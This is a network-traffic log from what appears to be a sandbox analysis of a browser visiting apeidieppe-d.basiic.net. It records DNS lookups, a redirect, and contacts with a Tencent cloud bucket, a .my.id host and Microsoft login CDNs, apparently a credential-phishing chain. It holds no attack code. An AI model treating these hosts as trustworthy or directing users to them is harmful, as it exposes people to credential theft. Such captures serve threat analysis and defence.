                                                                                                                  Oct 22, 2024 16:09:39.951960087 CEST53612631.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:39.952184916 CEST53585861.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:09:42.108809948 CEST53608421.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:07.835582972 CEST5830353192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:10:07.835968971 CEST5216153192.168.2.161.1.1.1
                                                                                                                  Oct 22, 2024 16:10:07.843771935 CEST53583031.1.1.1192.168.2.16
                                                                                                                  Oct 22, 2024 16:10:07.844552040 CEST53521611.1.1.1192.168.2.16
                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                  Oct 22, 2024 16:08:16.589700937 CEST192.168.2.161.1.1.1c219(Port unreachable)Destination Unreachable
                                                                                                                  Oct 22, 2024 16:08:35.117590904 CEST192.168.2.161.1.1.1c24f(Port unreachable)Destination Unreachable
                                                                                                                  Oct 22, 2024 16:08:44.835659027 CEST192.168.2.161.1.1.1c271(Port unreachable)Destination Unreachable
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Oct 22, 2024 16:08:14.894443989 CEST192.168.2.161.1.1.10x5b0cStandard query (0)apeidieppe-d.basiic.netA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:14.895265102 CEST192.168.2.161.1.1.10x84baStandard query (0)apeidieppe-d.basiic.net65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.552371979 CEST192.168.2.161.1.1.10xe1d9Standard query (0)apeidieppe-d.basiic.netA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.552594900 CEST192.168.2.161.1.1.10x66c6Standard query (0)apeidieppe-d.basiic.net65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.972189903 CEST192.168.2.161.1.1.10xab5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.972362995 CEST192.168.2.161.1.1.10x7685Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.587902069 CEST192.168.2.161.1.1.10xaf03Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.588146925 CEST192.168.2.161.1.1.10xc313Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.885857105 CEST192.168.2.161.1.1.10x4963Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.886003017 CEST192.168.2.161.1.1.10xcef5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.918145895 CEST192.168.2.161.1.1.10x48cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.918283939 CEST192.168.2.161.1.1.10x7023Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:23.152196884 CEST192.168.2.161.1.1.10x60a9Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:23.152441025 CEST192.168.2.161.1.1.10xa8b7Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.529452085 CEST192.168.2.161.1.1.10xb6acStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.529452085 CEST192.168.2.161.1.1.10xf99bStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.529961109 CEST192.168.2.161.1.1.10x261dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.530271053 CEST192.168.2.161.1.1.10x869bStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.530462027 CEST192.168.2.161.1.1.10x6475Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.530810118 CEST192.168.2.161.1.1.10xa4ceStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.531616926 CEST192.168.2.161.1.1.10xd7eaStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.531987906 CEST192.168.2.161.1.1.10x6881Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.531987906 CEST192.168.2.161.1.1.10xa775Standard query (0)5102487645-1323985617.cos.eu-frankfurt.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.533410072 CEST192.168.2.161.1.1.10xefe4Standard query (0)5102487645-1323985617.cos.eu-frankfurt.myqcloud.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.415704012 CEST192.168.2.161.1.1.10x8aacStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.415843010 CEST192.168.2.161.1.1.10x307cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.678461075 CEST192.168.2.161.1.1.10xa16dStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.678602934 CEST192.168.2.161.1.1.10x98d4Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.684140921 CEST192.168.2.161.1.1.10x8712Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.684288979 CEST192.168.2.161.1.1.10x7641Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.792469978 CEST192.168.2.161.1.1.10xe02fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.792738914 CEST192.168.2.161.1.1.10xf354Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:38.175503969 CEST192.168.2.161.1.1.10xfb3eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:38.175695896 CEST192.168.2.161.1.1.10x341fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.047755957 CEST192.168.2.161.1.1.10x22ddStandard query (0)5102487645.my.idA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.047970057 CEST192.168.2.161.1.1.10x3ed2Standard query (0)5102487645.my.id65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.069183111 CEST192.168.2.161.1.1.10x27e8Standard query (0)5102487645-1323985617.cos.eu-frankfurt.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.069466114 CEST192.168.2.161.1.1.10x9d17Standard query (0)5102487645-1323985617.cos.eu-frankfurt.myqcloud.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:41.761686087 CEST192.168.2.161.1.1.10xdc8eStandard query (0)5102487645.my.idA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:41.761686087 CEST192.168.2.161.1.1.10x8d13Standard query (0)5102487645.my.id65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.816371918 CEST192.168.2.161.1.1.10x119aStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.817833900 CEST192.168.2.161.1.1.10xb332Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.102493048 CEST192.168.2.161.1.1.10xaa6aStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.102850914 CEST192.168.2.161.1.1.10x20abStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:49.892224073 CEST192.168.2.161.1.1.10x22f7Standard query (0)5102487645.my.idA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:49.892420053 CEST192.168.2.161.1.1.10xfd95Standard query (0)5102487645.my.id65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:58.351819992 CEST192.168.2.161.1.1.10x9236Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:58.352092028 CEST192.168.2.161.1.1.10x6d02Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:00.244616032 CEST192.168.2.161.1.1.10xc2a7Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:00.244832993 CEST192.168.2.161.1.1.10x67a5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:23.161029100 CEST192.168.2.161.1.1.10x13e2Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:23.161205053 CEST192.168.2.161.1.1.10xb571Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:39.944484949 CEST192.168.2.161.1.1.10x21d3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:39.944628000 CEST192.168.2.161.1.1.10xe4ddStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:10:07.835582972 CEST192.168.2.161.1.1.10xc376Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:10:07.835968971 CEST192.168.2.161.1.1.10x1104Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Oct 22, 2024 16:08:14.905260086 CEST1.1.1.1192.168.2.160x84baNo error (0)apeidieppe-d.basiic.net65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:14.911990881 CEST1.1.1.1192.168.2.160x5b0cNo error (0)apeidieppe-d.basiic.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:14.911990881 CEST1.1.1.1192.168.2.160x5b0cNo error (0)apeidieppe-d.basiic.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.565355062 CEST1.1.1.1192.168.2.160x66c6No error (0)apeidieppe-d.basiic.net65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.589375019 CEST1.1.1.1192.168.2.160xe1d9No error (0)apeidieppe-d.basiic.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.589375019 CEST1.1.1.1192.168.2.160xe1d9No error (0)apeidieppe-d.basiic.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.979674101 CEST1.1.1.1192.168.2.160xab5No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.979674101 CEST1.1.1.1192.168.2.160xab5No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:16.979861975 CEST1.1.1.1192.168.2.160x7685No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.595365047 CEST1.1.1.1192.168.2.160xaf03No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.596716881 CEST1.1.1.1192.168.2.160xc313No error (0)www.google.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.893510103 CEST1.1.1.1192.168.2.160x4963No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.893510103 CEST1.1.1.1192.168.2.160x4963No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.894361973 CEST1.1.1.1192.168.2.160xcef5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.925607920 CEST1.1.1.1192.168.2.160x7023No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.926606894 CEST1.1.1.1192.168.2.160x48cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:18.926606894 CEST1.1.1.1192.168.2.160x48cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:23.160640955 CEST1.1.1.1192.168.2.160x60a9No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.536678076 CEST1.1.1.1192.168.2.160xb6acNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.536678076 CEST1.1.1.1192.168.2.160xb6acNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.536678076 CEST1.1.1.1192.168.2.160xb6acNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.536678076 CEST1.1.1.1192.168.2.160xb6acNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.537614107 CEST1.1.1.1192.168.2.160x869bNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.537646055 CEST1.1.1.1192.168.2.160x6475No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.537646055 CEST1.1.1.1192.168.2.160x6475No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.537777901 CEST1.1.1.1192.168.2.160xa4ceNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.537874937 CEST1.1.1.1192.168.2.160x261dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.537874937 CEST1.1.1.1192.168.2.160x261dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.538992882 CEST1.1.1.1192.168.2.160xd7eaNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.538992882 CEST1.1.1.1192.168.2.160xd7eaNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.540581942 CEST1.1.1.1192.168.2.160x6881No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.712285995 CEST1.1.1.1192.168.2.160xa775No error (0)5102487645-1323985617.cos.eu-frankfurt.myqcloud.comger.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.712285995 CEST1.1.1.1192.168.2.160xa775No error (0)ger.file.myqcloud.com162.62.150.176A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:34.712285995 CEST1.1.1.1192.168.2.160xa775No error (0)ger.file.myqcloud.com162.62.150.187A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.423439980 CEST1.1.1.1192.168.2.160x8aacNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.423439980 CEST1.1.1.1192.168.2.160x8aacNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.424896955 CEST1.1.1.1192.168.2.160x307cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.686736107 CEST1.1.1.1192.168.2.160x98d4No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.687932968 CEST1.1.1.1192.168.2.160xa16dNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.687932968 CEST1.1.1.1192.168.2.160xa16dNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.692060947 CEST1.1.1.1192.168.2.160x7641No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.692384958 CEST1.1.1.1192.168.2.160x8712No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.692384958 CEST1.1.1.1192.168.2.160x8712No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.800148964 CEST1.1.1.1192.168.2.160xe02fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.800148964 CEST1.1.1.1192.168.2.160xe02fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.800148964 CEST1.1.1.1192.168.2.160xe02fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:35.800148964 CEST1.1.1.1192.168.2.160xe02fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:38.182969093 CEST1.1.1.1192.168.2.160xfb3eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:38.182969093 CEST1.1.1.1192.168.2.160xfb3eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:38.183834076 CEST1.1.1.1192.168.2.160x341fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.381602049 CEST1.1.1.1192.168.2.160x27e8No error (0)5102487645-1323985617.cos.eu-frankfurt.myqcloud.comger.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.381602049 CEST1.1.1.1192.168.2.160x27e8No error (0)ger.file.myqcloud.com162.62.150.187A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.381602049 CEST1.1.1.1192.168.2.160x27e8No error (0)ger.file.myqcloud.com162.62.150.176A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:39.571127892 CEST1.1.1.1192.168.2.160x22ddNo error (0)5102487645.my.id162.241.71.126A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:42.208178043 CEST1.1.1.1192.168.2.160xdc8eNo error (0)5102487645.my.id162.241.71.126A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.824304104 CEST1.1.1.1192.168.2.160x119aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.824304104 CEST1.1.1.1192.168.2.160x119aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.824304104 CEST1.1.1.1192.168.2.160x119aNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.835549116 CEST1.1.1.1192.168.2.160xb332No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.835549116 CEST1.1.1.1192.168.2.160xb332No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.859281063 CEST1.1.1.1192.168.2.160x22abNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.859281063 CEST1.1.1.1192.168.2.160x22abNo error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:44.859281063 CEST1.1.1.1192.168.2.160x22abNo error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:45.775722980 CEST1.1.1.1192.168.2.160xbf44No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:45.775722980 CEST1.1.1.1192.168.2.160xbf44No error (0)dual.s-part-0044.t-0009.fb-t-msedge.nets-part-0044.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:45.775722980 CEST1.1.1.1192.168.2.160xbf44No error (0)s-part-0044.t-0009.fb-t-msedge.net13.107.253.72A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.109882116 CEST1.1.1.1192.168.2.160xaa6aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.109882116 CEST1.1.1.1192.168.2.160xaa6aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.109882116 CEST1.1.1.1192.168.2.160xaa6aNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.111884117 CEST1.1.1.1192.168.2.160x20abNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:46.111884117 CEST1.1.1.1192.168.2.160x20abNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:50.797832966 CEST1.1.1.1192.168.2.160x22f7No error (0)5102487645.my.id162.241.71.126A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:58.359488964 CEST1.1.1.1192.168.2.160x6d02No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:58.359678030 CEST1.1.1.1192.168.2.160x9236No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:08:58.359678030 CEST1.1.1.1192.168.2.160x9236No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:00.253362894 CEST1.1.1.1192.168.2.160x67a5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:00.253597975 CEST1.1.1.1192.168.2.160xc2a7No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:00.253597975 CEST1.1.1.1192.168.2.160xc2a7No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:23.168668032 CEST1.1.1.1192.168.2.160x13e2No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:39.951960087 CEST1.1.1.1192.168.2.160xe4ddNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:39.952184916 CEST1.1.1.1192.168.2.160x21d3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:09:39.952184916 CEST1.1.1.1192.168.2.160x21d3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:10:07.843771935 CEST1.1.1.1192.168.2.160xc376No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:10:07.843771935 CEST1.1.1.1192.168.2.160xc376No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                  Oct 22, 2024 16:10:07.844552040 CEST1.1.1.1192.168.2.160x1104No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                  • apeidieppe-d.basiic.net
                                                                                                                  • fs.microsoft.com
                                                                                                                  • https:
                                                                                                                    • challenges.cloudflare.com
                                                                                                                    • maxcdn.bootstrapcdn.com
                                                                                                                    • cdnjs.cloudflare.com
                                                                                                                    • code.jquery.com
                                                                                                                    • stackpath.bootstrapcdn.com
                                                                                                                    • 5102487645-1323985617.cos.eu-frankfurt.myqcloud.com
                                                                                                                    • 5102487645.my.id
                                                                                                                    • aadcdn.msauth.net
                                                                                                                    • aadcdn.msftauth.net
                                                                                                                  • slscr.update.microsoft.com
                                                                                                                  • a.nel.cloudflare.com
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1649713188.114.97.34432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:16 UTC671OUTGET /yKKWd HTTP/1.1
                                                                                                                  Host: apeidieppe-d.basiic.net
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:16 UTC848INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:16 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Location: http://apeidieppe-d.basiic.net/yKKWd/
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrb6tqr6gtmG3io%2F0KQ2kpbxfCQwJfEVP8EqN0vyYzURpsMYI84J8VYUMNG5t2Q3pN0aL7L8t1VgE%2Fa7ix5eRdj0dabNnyUFO8gSIMvrO%2Bq%2FKQLL2FzknyHjXNZSS6HO4sXFESenxDHxjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0ef56cc2e5b5-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1059&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1249&delivery_rate=2583407&cwnd=251&unsent_bytes=0&cid=657aa47aedb216e0&ts=408&x=0"
